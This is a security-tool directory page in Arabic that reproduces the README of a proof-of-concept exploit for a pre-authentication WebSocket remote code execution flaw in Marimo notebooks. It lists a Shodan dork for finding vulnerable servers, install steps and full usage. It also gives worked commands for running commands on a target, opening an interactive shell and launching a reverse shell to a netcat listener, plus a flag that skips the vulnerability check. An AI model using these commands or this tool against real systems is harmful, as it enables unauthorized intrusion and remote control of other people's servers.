Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 أداة استغلال - Marimo < 0.23.0 RCE قبل المصادقة (WebSocket) | Kitploit
أدوات/GitHubGitHub/m3ph1569/cve-2026-39987-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 أداة استغلال - Marimo < 0.23.0 RCE قبل المصادقة (WebSocket)

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-39987 - Marimo < 0.23.0 RCE قبل المصادقة (WebSocket)

CVSS Severity Python License

أداة إثبات المفهوم (PoC) لاستغلال ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة في إصدارات Marimo الأقدم من 0.23.0.

تتيح هذه الثغرة لمهاجم غير مصادق الاتصال بنقطة نهاية WebSocket (/terminal/ws) وتنفيذ أوامر نظام تعسفية على الخادم الهدف.

الميزات

  • التحقق التلقائي: يتحقق تلقائيًا من وجود الثغرة في الهدف من خلال تحديد الإصدار والتحقق من وجود تطبيق Marimo (عبر favicon ونقطة نهاية /api/version).
  • تنفيذ أمر واحد: أرسل أمرًا واحدًا إلى الهدف واستلم المخرجات.
  • صدفة تفاعلية: إنشاء صدفة تفاعلية شبه دائمة للتفاعل مع الهدف بسلاسة.
  • توليد Reverse Shell: دعم مدمج لتوليد وتنفيذ حمولات reverse shell.
  • تجاوز التحقق: إمكانية تجاوز فحوصات الإصدار والوجود باستخدام خيار --no-check للبيئات التي قد تكون نقاط النهاية فيها محجوبة.

Shodan / FOFA Dork

يمكنك استخدام الاستعلام (dork) التالي لتحديد الحالات التي قد تكون معرضة للخطر:

root@kitploit:~
http.favicon.hash:-1864630356

التثبيت

يُنصح باستخدام بيئة Python افتراضية لتثبيت التبعيات.

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
cd CVE-2026-39987-POC

# 2. Create and activate a virtual environment
python -m venv .CVE-2026-39987

# Windows
.CVE-2026-39987\Scripts\activate
# Linux/macOS
source .CVE-2026-39987/bin/activate

# 3. Upgrade pip and Install required dependencies
# Windows
py pip install --upgrade pip ; pip install -r requirements.txt
# Linux/MacOS
python3 pip install --upgrade pip && pip install -r requirements.txt

الاستخدام

root@kitploit:~
usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]

positional arguments:
  target               Target URL (e.g. http://localhost:8080)
  command              Command to execute (omit when using -i)

options:
  -h, --help           show this help message and exit
  --no-check           Skip vulnerability version check

Execution modes:
  -i, --interactive    Interactive shell mode
  --revshell IP PORT   Generate & send a bash reverse shell payload

WebSocket tuning:
  --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
  --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
  --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)

Reconnect options:
  --max-retries N      Max auto-reconnect attempts (default: 5)
  --no-reconnect       Disable auto-reconnect on unexpected disconnect

أمثلة

1. تنفيذ أمر واحد:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "id"

2. تشغيل صدفة تفاعلية:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 -i

3. تنفيذ reverse shell: تأكد من تشغيل مستمع netcat على جهازك (مثل: nc -lvnp 4444).

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444

4. تخطي فحوصات التحقق وفرض التنفيذ:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check

المساهمة

المساهمات مرحّب بها! لا تتردد في تقديم طلب سحب (Pull Request).

  1. انسخ المستودع (Fork)
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/update-feature)
  3. نفّذ التغييرات (git commit -m 'Add update feature')
  4. ادفع إلى الفرع (git push origin feature/update-feature)
  5. افتح طلب سحب (Pull Request)

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية والاختبار الأخلاقي المصرح به فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار أو أنشطة غير قانونية ناتجة عن هذا السكريبت. تأكد دائمًا من حصولك على إذن صريح من مالك النظام قبل إجراء أي اختبار أمني. الاستخدام غير المصرح به لهذا السكريبت غير قانوني ويعاقب عليه القانون.

الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.


صُنع بـ ☕︎ بواسطة M3PH1569
تنزيل الأداة